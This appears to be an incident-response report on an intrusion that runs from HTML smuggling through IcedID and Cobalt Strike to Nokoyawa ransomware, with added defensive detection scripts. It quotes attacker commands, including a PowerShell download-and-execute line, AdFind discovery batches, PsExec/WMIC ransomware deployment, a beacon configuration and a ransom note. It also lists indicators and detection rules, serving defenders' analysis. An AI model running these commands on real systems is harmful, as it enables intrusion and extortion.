New Malicious Method: From HTML to Nokoyawa Ransomware

25 September 2023 21 minutes Author: Cyber Witcher

HTML Smuggling: Distribution of the Nokoyawa Ransomware Virus

Today’s cybersecurity landscape is shaped by a myriad of demands and threats, leading to constant innovation in the world of cybercrime. Cybercriminals are constantly looking for new and inventive ways to launch attacks and gain unauthorized access to valuable data and resources. In this context, incidents involving HTML macros and ransomware, in particular Nokoyawa, become especially important. This article analyzes one of these new and dangerous attack methods, which combines HTML macros and ransomware to infiltrate a network and spread the threat. We will examine this incident without going into specific examples, focusing instead on the general characteristics and stages of the attack.

HTML macros: the enemy’s entry point

HTML macros, also known as web page macros, were previously used to implement functionality on websites and in electronic documents. Over time, however, cybercriminals have discovered how to use these macros as a means of building effective attacks. The incident we are looking at started with the electronic delivery of an HTML file that triggered the attack. Analysis revealed that this delivery occurred via email, making this attack method particularly dangerous.

HTML smuggling: a deception tool

An HTML file opened by the user caused a fake Adobe page to be displayed and a ZIP archive to be downloaded. One of the key aspects of this stage of the attack is the use of a technique known as HTML smuggling: the user sees a fake page, while behind the scenes malicious content is downloaded. The ZIP archive was password-protected, with the password shown on the lure page, to protect the malicious content from automated analysis. This was just the first step in the cybercriminals’ plan.

From ZIP to Nokoyawa: the inside story

The ZIP archive contained an ISO file, and here is the main trick: the ISO carried the malware payload, but hidden behind a layer of protection. To get past this layer, the attackers used an LNK file disguised as a document. When the user clicked on the LNK file, a sequence of commands was executed that copied the malicious content from the ISO to the host before launching the malware.

Nokoyawa ransomware: the final act

After the malicious DLL was loaded, a connection was made to the IcedID command and control servers, another threat in this incident. The user, meanwhile, saw a legitimate image of a financial document rather than any sign of the attack. The attackers also used various tools and commands for discovery and to deploy their malware. They moved laterally through the network and used a variety of methods to gain unauthorized access and launch attacks.

Summary of the case

In early November 2022, the intrusion began with the delivery of an HTML file. We estimate with high confidence that the delivery was by email, as reported in other public reports. This HTML file used a technique known as HTML smuggling. This is one of the methods attackers have turned to since Microsoft changed the default macro controls. Just a month earlier, this threat actor was observed using Excel macros in a very similar campaign.

When the user opened the HTML file, a fake Adobe page was displayed and a ZIP file was downloaded. The Adobe lure included the password for the ZIP, as a way to protect the malicious content from automated analysis. Inside the ZIP was an ISO file, and inside the ISO was the malware payload. The only file visible to the user was an LNK file masquerading as a document.

When the user clicked on the LNK file, a series of commands was executed. This involved copying rundll32 and the malicious DLL from the ISO to the host before running the malware. After the malicious DLL was loaded, a connection was established to the IcedID command and control servers. In the meantime, the user was shown a legitimate image of a financial document.

When the malicious DLL was executed, persistence was also established via a scheduled task on the beachhead host. This task was set to run the IcedID malware every hour. The initial discovery commands were run a few seconds after contact with the command and control server.

About three hours after the initial IcedID malware was executed, a cmd process was spawned from IcedID. This new process started beaconing to a Cobalt Strike server. The process was then observed accessing LSASS, presumably to obtain credentials. A quick check of domain administrators using net was also observed.

Activity then paused for about three hours before the threat actor returned. Using the Cobalt Strike beacon, the attacker looked up specific domain administrators with the net utility. With one of these accounts, the attacker initiated an RDP session to the domain controller. In this session, the threat actor copied the Cobalt Strike beacon to the domain controller and executed it.

The attacker then continued discovery by executing a batch file on the domain controller that ran the usual battery of Active Directory discovery commands with AdFind. On completion, the results of the discovery commands were archived with 7-Zip. The attacker then ran a second batch file that iterated over the network, performing an nslookup for each host in the environment.

After about five hours, the attacker returned to the domain controller and executed an encoded PowerShell command that ran SessionGopher. SessionGopher is a tool that finds and decrypts stored session information for remote access tools. The attacker then accessed additional hosts via RDP, including a backup server and a file share server. On the backup server, the attacker opened the backup console. On the file share server, they used Notepad to view a file on the host.

The attacker went back to the domain controller and used Netscan to scan the network. After scanning, PsExec and WMIC were used to move files between systems on the network. The key files copied were k.exe and p.bat: the ransomware binary and the batch script used to execute it.

Five minutes after the files were transferred to hosts in the domain, the Nokoyawa ransomware binary was launched on the domain controller. At the same time, PsExec was used to execute p.bat, which runs the ransomware binary, on the other hosts in the domain. The time to ransomware (TTR) was just over 12 hours from initial infection.


In this case we see two different threat actors: the distributor and the hands-on-keyboard actor. Proofpoint tracks the distributor as TA551. The hands-on-keyboard actor is tracked by Microsoft as Storm-0390, a “pen test” team led by Periwinkle Tempest (previously tracked as Storm-0193 and DEV-0193).

The ransomware affiliate was observed using RDP from a system with the hostname WIN-5J00ETD85P5. This hostname matches the one used by the threat actor in a previous Nokoyawa case. Using internet scanning tools, we can see that this hostname is currently active at 78.128.113[.]154, hosted on AS209160 (Miti2000) in Bulgaria.

Initial access

This campaign used compromised emails to deliver a malicious HTML file. According to Proofpoint, the campaign was linked to a distribution group they track as TA551. Thanks to Proofpoint for the example below.

When the HTML file was downloaded and opened, it dropped a password-protected ZIP file with a random name. The user was shown the password needed to extract it. The following image shows the HTML file opened in the browser.

The ISO file from the ZIP archive, when mounted, contained one visible LNK file (documents-9771) and three hidden files: demurest.cmd, pimpliest_kufic.png and templates544.png.

Once executed, a legitimate image is displayed to reassure the user that nothing is wrong.


The ISO file contained an LNK file with an image icon that invited the user to click on it. When the user opened the LNK file, the demurest.cmd batch script was executed.

The batch script in demurest.cmd did the following:

  1. Opened pimpliest_kufic.png to display the decoy image.

  2. Used the Windows xcopy utility to copy rundll32.exe to %temp%\entails.exe.

  3. Built the string “templates544.png” at runtime and copied that file under a random name in the format RANDOM_NUM.RANDOM_NUM.

  4. Executed templates544.png, which was the IcedID DLL, via entails.exe.

Looking at command lines in memory (MemProcFS), we can see cmd.exe executing entails.exe, which in turn executes the IcedID DLL. The cmd.exe -> entails.exe call chain, with explorer.exe as the top-level parent process, is also visible.

About six hours into the intrusion, 1.dll (Cobalt Strike) was dropped on the beachhead and then copied to the domain controller. After transferring 1.dll to the domain controller, it was executed through rundll32.exe using the following command:

rundll32.exe 1.dll, DllRegisterServer


For persistence, IcedID registered a scheduled task on the beachhead that ran every hour.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="">
  <RegistrationInfo>
    <TimeTrigger id="TimeTrigger">
    <LogonTrigger id="LogonTrigger">
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
  <Actions Context="Author">
      <Arguments>"C:\Users\REDACTED\AppData\Local\REDACTED\Izjeubaw64.dll",#1 --oyxo="EdgeDecrease\license.dat"</Arguments>

We can also see similar information in memory when viewing recently created scheduled tasks:
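As an added example (not part of the original report), the following Python script triages exported Task Scheduler XML for the traits of this task: a repetition interval of an hour or less, RunLevel HighestAvailable, and a rundll32 action whose DLL sits under a user-writable path and is called by ordinal (",#1"). Both task definitions are constructed, the namespace is the standard Task Scheduler one, and the REDACTED path segments are placeholders.

```python
"""Triage Task Scheduler XML (as exported by schtasks /Query /XML) for the
persistence pattern seen in this case. Added example, not the report's code;
the two task definitions below are constructed and REDACTED is a placeholder."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Path fragments a standard user can write to; a scheduled DLL living here is a red flag.
USER_WRITABLE = ("\\appdata\\local", "\\appdata\\roaming", "\\temp\\", "\\users\\public")
DURATION_RE = re.compile(r"PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?")

SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger id="TimeTrigger">
      <Repetition><Interval>PT1H</Interval></Repetition>
      <Enabled>true</Enabled>
    </TimeTrigger>
    <LogonTrigger id="LogonTrigger"><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>rundll32.exe</Command>
    <Arguments>"C:\\Users\\REDACTED\\AppData\\Local\\REDACTED\\Izjeubaw64.dll",#1 --oyxo="EdgeDecrease\\license.dat"</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\\Program Files\\Vendor\\updater.exe</Command><Arguments>/check</Arguments>
  </Exec></Actions>
</Task>"""


def interval_seconds(iso_duration: str) -> int:
    """Convert the ISO 8601 PTnHnMnS form used by Task Scheduler to seconds (0 if not that form)."""
    m = DURATION_RE.fullmatch(iso_duration)
    if not m:
        return 0
    h, mi, s = (int(x) if x else 0 for x in m.groups())
    return h * 3600 + mi * 60 + s


def triage_task(xml_text: str) -> dict:
    """Return the task's key fields plus the list of indicators it triggers."""
    root = ET.fromstring(xml_text)
    intervals = [e.text or "" for e in root.iterfind(".//t:Repetition/t:Interval", NS)]
    run_level = root.findtext(".//t:Principal/t:RunLevel", default="", namespaces=NS)
    actions = [(ex.findtext("t:Command", default="", namespaces=NS),
                ex.findtext("t:Arguments", default="", namespaces=NS))
               for ex in root.iterfind(".//t:Actions/t:Exec", NS)]
    flags = []
    if any(0 < interval_seconds(i) <= 3600 for i in intervals):
        flags.append("repeats_hourly_or_faster")
    if run_level == "HighestAvailable":
        flags.append("highest_available")
    for cmd, args in actions:
        if cmd.lower().split("\\")[-1] == "rundll32.exe":
            if any(p in args.lower() for p in USER_WRITABLE):
                flags.append("rundll32_dll_in_user_writable_path")
            if re.search(r",\s*#\d+", args):  # export called by ordinal, as in ",#1"
                flags.append("rundll32_export_by_ordinal")
    return {"intervals": intervals, "run_level": run_level, "actions": actions, "flags": flags}


if __name__ == "__main__":
    print(triage_task(SUSPICIOUS_TASK)["flags"])
    print(triage_task(BENIGN_TASK)["flags"])
```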

Elevation of privileges

The compromised user had local administrator rights on their computer, which allowed the attacker to use tools that required higher permissions.

Defense evasion

By inspecting the contents of the malicious HTML file, we can spot the HTML smuggling in the code. First, looking at the <script> tags, we arrive at the following:

If we take this block of data, base64 decode it and write the result to a file, we find the archived ISO file hidden in the document:

The PK header indicates that the data is the start of a ZIP file, and the data that follows indicates that its content is an ISO file.
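To make that check repeatable, here is an added Python triage script (not from the original report) that pulls base64 literals out of <script> blocks, decodes them and identifies the container by magic bytes, then lists the ZIP members and sniffs each for the ISO 9660 signature so the ZIP-wrapping-ISO chain is reported end to end. The lure and its payload are constructed in memory, and the member name documents-9771.iso is an assumption.

```python
"""Offline triage of an HTML smuggling lure: pull base64 string literals out of
<script> blocks, decode them and identify the dropped container by its magic
bytes (ZIP local file header PK\\x03\\x04; ISO 9660 'CD001' at offset 0x8001).
Added example, not the report's code: the lure and the ZIP-wrapped ISO below
are constructed in memory, so nothing is fetched or written to disk."""
import base64
import io
import re
import zipfile

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
B64_RE = re.compile(r"""['"]([A-Za-z0-9+/=\s]{64,})['"]""")  # long quoted base64 literal
ISO_PVD_OFFSET = 0x8001  # sector 16 + 1 byte: ISO 9660 primary volume descriptor id


def sniff(blob: bytes) -> str:
    """Classify a decoded blob by magic bytes."""
    if blob.startswith(b"PK\x03\x04"):
        return "zip"
    if blob[ISO_PVD_OFFSET:ISO_PVD_OFFSET + 5] == b"CD001":
        return "iso9660"
    return "unknown"


def extract_smuggled(html: str) -> list:
    """One finding per decodable base64 literal inside a <script> block. ZIP
    members are listed and sniffed as well; password-protected members (as in
    this case) are reported as encrypted rather than read."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        for literal in B64_RE.findall(script):
            try:
                blob = base64.b64decode("".join(literal.split()), validate=True)
            except ValueError:
                continue  # not base64 after all (e.g. a long plain string)
            finding = {"type": sniff(blob), "size": len(blob), "members": []}
            if finding["type"] == "zip":
                try:
                    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
                        for info in zf.infolist():
                            if info.flag_bits & 0x1:  # general-purpose bit 0: encrypted
                                finding["members"].append((info.filename, "encrypted"))
                            else:
                                finding["members"].append((info.filename, sniff(zf.read(info))))
                except zipfile.BadZipFile:
                    finding["members"].append(("<truncated>", "bad zip"))
            findings.append(finding)
    return findings


def build_sample_lure() -> str:
    """Constructed stand-in for the lure: a minimal ISO 9660 image (primary
    volume descriptor at sector 16) zipped and base64-embedded in a <script>."""
    iso = bytearray(0x8000 + 2048)
    iso[0x8000:0x8007] = b"\x01CD001\x01"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("documents-9771.iso", bytes(iso))  # assumed member name
    b64 = base64.b64encode(buf.getvalue()).decode()
    return ("<html><body><h1>Adobe Acrobat</h1>"
            f"<script>var data = '{b64}';</script></body></html>")


if __name__ == "__main__":
    for f in extract_smuggled(build_sample_lure()):
        print(f["type"], f["size"], f["members"])
```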

The initial malicious package used the Windows xcopy utility to copy rundll32.exe as entails.exe. This most likely evades detection logic keyed on the rundll32 process name or command line. Entails.exe, which loaded the IcedID DLL, was then seen injecting into the cmd.exe process on the beachhead host.

Below we can see the IcedID loader in memory in the entails.exe process:

The entails.exe process first opened a handle to cmd.exe with GrantedAccess 0x1fffff, which corresponds to PROCESS_ALL_ACCESS, and then called CreateRemoteThread; these were recorded as Sysmon Event ID 10 and 8 respectively, as shown below:

Memory analysis also shows beacon.dll injected into cmd.exe.

Malpedia’s win_cobalt_strike_auto YARA rule was triggered while scanning the memory of the cmd.exe process. The following Cobalt Strike beacon configuration was pulled from process memory:

"BeaconType": "windows-beacon_https-reverse_https",
"Port": 443,
"SleepTime": 60000,
"Maxgetsize": 1048576,
"Jitter": 0,
"MaxDns": 0,
"PublicKey": "30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f bb 1c 18 64 6c 37 7e 03 01 6b 16 2b 12 ba 72 bd f7 dc 36 b4 cd 2e 4e 9b ae 12 20 5a 95 c2 61 70 bf 90 81 05 ad 7f a4 bb cc fa 79 86 32 26 1b ed 98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c ae 03 15 bf de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00 db 27 d7 8a d8 fd 13 b6 a7 3b 9f b7 c3 fb 4d 7a 08 8e 32 3f 07 61 86 56 ec d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
"c2_server": ",/pixel.gif",
"UserAgent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"PostURI": "/submit.php",
"Malleable_C2_Instructions2": "",
"HttpGetHeader": "Cookie",
"HttpPostHeader": "\n\u0026Content-Type: application/octet-streamid",
"SpawnTo": "",
"PipeName": "",
"KillDateYear": 0,
"KillDateMonth": 0,
"KillDateDay": 0,
"DNSIdle": "",
"DNSSleep": 0,
"SSH_1": "",
"SSH_2": "",
"SSH_3": "",
"SSH_4": "",
"SSH_5": "",
"GetVerb": "GET",
"PostVerb": "POST",
"HttpPostChunk": 0,
"SpawnTox86": "%windir%\\syswow64\\rundll32.exe",
"SpawnTox64": "%windir%\\sysnative\\rundll32.exe",
"CryptoScheme": 0,
"Proxy": "",
"ProxyUsername": "",
"ProxyPassword": "",
"ProxyType": "IE settings",
"Deprecated": 0,
"LicenseId": 305419776,
"bStageCleanup": 0,
"bCFGCaution": 0,
"KillDate": 0,
"TextSectionEnd": 0,
"ObfuscateSectionsInfo": "",
"ProcessInjectMinAlloc": 0,
"ProcessInjectTransformx86": "",
"ProcessInjectTransformx64": "",
"UsesCookies": 1,
"ProcessInjectExecute": "",
"ProcessInjectAllocationMethod": 0,
"ProcessInjectStub": "b5 4a fe 01 ec 6a 75 ed f3 5e 1a 44 f8 bd 39 29",
"HostHeader": ""

The IP and port correspond to what we see in memory:

The injected cmd.exe process, in turn, injected into rundll32.exe.

Account access

It appears that Cobalt Strike was used to access the LSASS memory space. The GrantedAccess values were 0x1010 and 0x1fffff. These values can be used to identify credential access.
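The two Sysmon patterns described above (entails.exe opening cmd.exe with PROCESS_ALL_ACCESS before CreateRemoteThread, and the beacon opening LSASS with 0x1010 and 0x1fffff) can be expressed as detection logic; the Python below is an added example, not the report's code, and runs over constructed stand-ins for parsed Sysmon Event ID 10 and 8 records.

```python
"""Detection logic for two Sysmon patterns from this case: a process opening
lsass.exe with a mask that allows reading its memory (0x1010 or 0x1fffff), and
a process opening another with write+thread rights (e.g. PROCESS_ALL_ACCESS)
and then creating a remote thread in it (Event 10 followed by Event 8).
Added example, not the report's code; EVENTS are constructed records."""
from datetime import datetime, timedelta

PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF
INJECT_WINDOW = timedelta(seconds=60)

# Constructed Sysmon Event ID 10 (ProcessAccess) and 8 (CreateRemoteThread) records.
EVENTS = [
    {"EventID": 10, "UtcTime": "2022-11-01 10:02:11", "GrantedAccess": "0x1FFFFF",
     "SourceImage": r"C:\Users\user\AppData\Local\Temp\entails.exe", "TargetImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 8, "UtcTime": "2022-11-01 10:02:11",
     "SourceImage": r"C:\Users\user\AppData\Local\Temp\entails.exe", "TargetImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 10, "UtcTime": "2022-11-01 13:15:40", "GrantedAccess": "0x1010",
     "SourceImage": r"C:\Windows\System32\cmd.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 10, "UtcTime": "2022-11-01 13:15:41", "GrantedAccess": "0x1400",  # query only, no VM_READ
     "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": r"C:\Windows\System32\lsass.exe"},
]


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def can_read_memory(mask: int) -> bool:
    """True when the mask allows reading process memory and querying the process,
    the minimum a credential dumper needs; matches both 0x1010 and 0x1fffff."""
    query = PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION
    return bool(mask & PROCESS_VM_READ) and bool(mask & query)


def detect_lsass_access(events):
    """Event 10 records targeting lsass.exe with a memory-reading access mask."""
    hits = []
    for e in events:
        if e["EventID"] != 10 or not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        if can_read_memory(int(e["GrantedAccess"], 16)):
            hits.append((e["UtcTime"], e["SourceImage"], e["GrantedAccess"]))
    return hits


def detect_injection(events):
    """Pair an Event 10 granting VM_WRITE and CREATE_THREAD with a later Event 8
    from the same source into the same target within INJECT_WINDOW."""
    opens, hits = {}, []
    for e in sorted(events, key=lambda ev: parse_time(ev["UtcTime"])):
        key = (e["SourceImage"].lower(), e["TargetImage"].lower())
        if e["EventID"] == 10:
            mask = int(e["GrantedAccess"], 16)
            if mask & PROCESS_VM_WRITE and mask & PROCESS_CREATE_THREAD:
                opens[key] = parse_time(e["UtcTime"])
        elif e["EventID"] == 8 and key in opens:
            if parse_time(e["UtcTime"]) - opens[key] <= INJECT_WINDOW:
                hits.append((e["UtcTime"], e["SourceImage"], e["TargetImage"]))
    return hits


if __name__ == "__main__":
    print("LSASS access:", detect_lsass_access(EVENTS))
    print("Injection chains:", detect_injection(EVENTS))
```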

Named pipes were created with Cobalt Strike’s default “postex_” prefix.

An encoded PowerShell command was observed running from the Cobalt Strike beacon on one of the domain controllers.

After decoding, this command showed the execution of the SessionGopher script.

IEX (New-Object Net.Webclient).DownloadString(''); Invoke-SessionGopher


After the IcedID DLL was loaded through the renamed rundll32, the following discovery commands were observed on the beachhead host:

cmd.exe /c chcp >&2
ipconfig /all
systeminfo
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
net group "Domain Admins" /domain

As part of the discovery commands, IcedID used WMI to list the antivirus products installed on the beachhead host with the following command:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List

The attacker also ran the following discovery commands via cmd.exe (the injected Beacon process):

net group "domain admins" /domain
net user Administrator /domain
cmd.exe /C dir *.txt
cmd.exe /C dir *.dll

AdFind was used for discovery on the domain controller using a batch script called adfind.bat. The script executed the following commands:

adfind.exe -f (objectcategory=person) > ad_users.txt
adfind.exe -f objectcategory=computer > ad_computers.txt
adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
7.exe a -mx3 ad.7z ad_*
del 7.exe adfind* ad_*

After that, the attacker dropped a new ns.bat batch file. This file contained a list of hosts on the network to perform a DNS lookup with nslookup.

C:\Windows\system32\cmd.exe /C ns.bat
nslookup [REDACTED HOST X]

Shortly before the ransomware deployment began, the attacker connected to the backup server and opened the backup console on the host. A final network discovery scan was then run from the domain controller using the SoftPerfect Netscan tool.

Lateral movement

The attacker connected to various hosts on the network via an RDP tunnel through the beacon process on the beachhead host.

The threat actor’s hostname can be found in several Windows event logs: event IDs 4624, 4776, 4778 and 4779.


Workstation name seen in event 4624 on the beachhead:

Again in event 4776 from the domain controller:

And again 4778 and then 4779 on the domain controller:

During an RDP session, 1.dll (the Cobalt Strike DLL) was transferred from the beachhead via Windows File Explorer.

Similarly, the final files used for the ransomware deployment were transferred the same way, as can be seen from file creation events that log Explorer.EXE as the creating process.

After k.exe and p.bat, as well as various other batch scripts, were transferred to the compromised domain controller, the attacker attempted to copy k.exe to other computers on the network using a copy command executed on the domain controller.

Either this command did not work as intended, or it was a fallback: the threat actor ran the copy again, but this time, instead of running cmd /K copy on the domain controller, they used wmic to run the copy command from the remote host.

The same sequence was repeated for p.bat; this repetition suggests scripted execution rather than a failed copy.

First, the copy command issued on the domain controller:

Second, the copy command issued through WMIC so that the remote hosts run it:

After k.exe and p.bat were copied to computers on the network, the attacker used PsExec.exe to remotely create a service called mstdc that ran p.bat under the SYSTEM account (p.bat runs k.exe, which encrypts the system based on a Base64-encoded configuration).

A “.key” file is created on each host that PsExec is run against. The filename contains the hostname of the machine that initiated PsExec.


After AdFind was finished, the results were archived using 7-Zip.

Command and control

IcedID

An outbound connection to trentonkaizerfak[.]com was established after entails.exe (rundll32.exe) successfully executed templates544.png on the beachhead host.

This downloaded a gzip file containing the next stage of IcedID. After this payload was executed, command and control was established to 5.255.103[.]16.

Cobalt Strike

Once injected into cmd.exe, 1.dll (the Cobalt Strike DLL) was created on the beachhead host and later pushed to the domain controller. 1.dll was then executed on the domain controller via rundll32.exe, and once running, rundll32.exe connected to the command and control server 5.8.18[.]242.


An attacker was observed deploying the Nokoyawa ransomware throughout the environment using both PSExec and WMIC.

psexec.exe \\[TARGET IP] -u [DOMAIN]\[USER] -p "[PASSWORD]" -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat

wmic /node:"[TARGET IP]" /user:"[DOMAIN]\[USER]" /password:"[PASSWORD]" process call create "cmd.exe /c c:\windows\temp\p.bat"

This duplicate execution with both PsExec and WMIC mirrors the duplicate commands used to copy files across the network, pointing to scripted execution with a built-in fallback.

A batch file (p.bat) is responsible for executing the ransomware binary (k.exe) along with its configurations.

c:\windows\temp\k.exe --config REDACTED

Reviewing the configuration passed in the command options, this ransomware is configured to encrypt network shares, mount hidden drives, and delete volume shadow copies.

Additionally, the configuration informs the ransomware binary to skip the following directories and file extensions.

Excluded directories
- Windows
- Program Files
- Program Files (x86)
- AppData
- ProgramData
- System Volume Information

Excluded file extensions
- .exe
- .dll
- .ini
- .lnk
- .url
- ""

Ransom note


If you see this, your files have been successfully encrypted.
We advise you not to look for a free decryption method.
It is impossible. We use symmetric and asymmetric encryption.

    - Do not rename encrypted files.
    - Do not modify encrypted files.
    - Do not use third-party software.
To reach an agreement, we suggest you visit our Onion site.
How to open an Onion link:
    - Download the TOR browser from the official site.
    - Open it and enter this link:
    - On the page you will see a chat with the support service.
    - Send your first message.
The sooner you contact us, the sooner you will receive a solution.


Diamond model


Cobalt Strike:

  trentonkaizerfak[.]com at
  questdisar[.]com at
  pikchayola[.]photos at

ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike
ET INFO RDP - Response To External Host
ET MALWARE Meterpreter or Other Reverse Shell SSL Cert
ET MALWARE Win32/IcedID Request Cookie
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
ET POLICY PsExec service created
ET POLICY SMB Executable File Transfer
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB2 NT Create AndX Request For an Executable File In a Temp Directory
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET SCAN Behavioral Unusually fast Terminal Server Traffic Potential Scan or Infection (Inbound)
ET SCAN Behavioral Unusually fast Terminal Server Traffic Potential Scan or Infection (Outbound)


DFIR Report Repo:

CHCP CodePage Locale Lookup dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f
AdFind Discovery 50046619-1037-49d7-91aa-54fc92923604

Sigma Repo:

Bad Opsec Defaults Sacrificial Processes With Improper Arguments a7c3d773-caef-227e-a7e7-c2f13c622329
Change PowerShell Policies to an Insecure Level 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180
CMD Shell Output Redirect 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a
CobaltStrike BOF Injection Pattern 09706624-b7f6-455d-9d02-adee024cee1d
First Time Seen Remote Named Pipe 52d8b0c6-53d6-439a-9e41-52ad442ad9ad
ISO File Created Within Temp Folders 2f9356ae-bf43-41b8-b858-4496d83b2acb
ISO Image Mount 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073
New Process Created Via Wmic.EXE 526be59f-a573-4eea-b5f7-f0973207634d
Net.exe Execution 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac
Non Interactive PowerShell Process Spawned f4bbd493-b796-416e-bbf2-121235348529
Potential Defense Evasion Via Rename Of Highly Relevant Binaries 0ba1da6d-b6ce-4366-828c-18826c9de23e
Potential Execution of Sysinternals Tools 7cccd811-7ae9-4ebe-9afd-cb5c406b824b
Potential Recon Activity Via Nltest.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248
Process Creation Using Sysnative Folder 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab
Psexec Execution 730fc21b-eaff-474b-ad23-90fd265d4988
Rundll32 Execution Without DLL File c3a99af4-35a9-4668-879e-c09aeb4f2bdf
Share And Session Enumeration Using Net.EXE 62510e69-616b-4078-b371-847da438cc03
SMB Create Remote File Admin Share b210394c-ba12-4f89-9117-44a2464b9511
Suspicious Call by Ordinal e79a9e79-eb72-4e78-a628-0e7e8f59e89c
Suspicious Copy From or To System32 fff9d2b7-e11c-4a69-93d3-40ef66189767
Suspicious Encoded PowerShell Command Line ca2092a1-c273-4878-9b4b-0d60115bf5ea
Suspicious Execution of Hostname 7be5fb68-f9ef-476d-8b51-0256ebece19e
Suspicious Group And Account Reconnaissance Activity Using Net.EXE d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
Suspicious Manipulation Of Default Accounts Via Net.EXE 5b768e71-86f2-4879-b448-81061cbae951
Suspicious Network Command a29c1813-ab1f-4dde-b489-330b952e91ae
Suspicious Process Created Via Wmic.EXE 3c89a1e8-0fba-449e-8f1b-8409d6267ec8
Suspicious Rundll32 Without Any CommandLine Params 1775e15e-b61b-4d14-a1a3-80981298085a
WMIC Remote Command Execution 7773b877-5abb-4a3e-b9c9-fd0369b59b00
WmiPrvSE Spawned A Process d21374ff-f574-44a7-9998-4a8c8bf33d7d
CobaltStrike Named Pipe d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
Suspicious Execution of Systeminfo 0ef56343-059e-4cb6-adc1-4c3c967c5e46